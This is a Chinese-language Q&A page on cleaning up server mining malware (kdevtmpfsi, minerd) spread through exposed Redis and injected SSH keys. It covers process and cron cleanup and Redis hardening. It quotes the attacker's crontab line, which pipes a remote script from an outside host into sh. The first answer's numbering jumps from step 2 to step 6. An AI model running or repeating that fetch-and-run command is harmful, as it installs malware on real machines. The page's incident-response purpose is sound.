當前位置:首頁 » 挖礦知識 » redis寫入ssh密匙挖礦

redis寫入ssh密匙挖礦

發布時間: 2023-05-20 03:38:56

挖礦病毒怎麼處理

挖礦病毒處理步驟如下:

1、查看伺服器進程運行狀態查看伺服器系統整體運行情況,發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。

2、查看埠及外聯情況查看埠開放狀態及外聯情況,發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址,進一步確定該進程為惡意挖礦進程:定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。

6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。

7、查找敏感文件發現authorized_keys文件。

8、查看ssh日誌文件查看ssh日誌文件,發現大量登陸痕跡以及公鑰上傳痕跡。

② 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

熱點內容
浙大網新自主研發區塊鏈技術 發布:2025-07-01 08:26:35 瀏覽:302
以太坊價位提醒 發布:2025-07-01 08:15:34 瀏覽:987
去成都市第四人民醫院體檢中心在哪 發布:2025-07-01 08:15:01 瀏覽:652
區塊鏈最新招聘 發布:2025-07-01 08:10:46 瀏覽:124
幾天能挖到一個比特幣 發布:2025-07-01 08:10:36 瀏覽:618
doge臉樂器表情包 發布:2025-07-01 08:08:03 瀏覽:943
廣州黃浦區的區塊鏈公司 發布:2025-07-01 07:57:56 瀏覽:19
幣圈縮量換手率低 發布:2025-07-01 07:43:49 瀏覽:83
區塊鏈雲大數據物聯視頻 發布:2025-07-01 07:38:13 瀏覽:763
div數字貨幣 發布:2025-07-01 07:36:04 瀏覽:771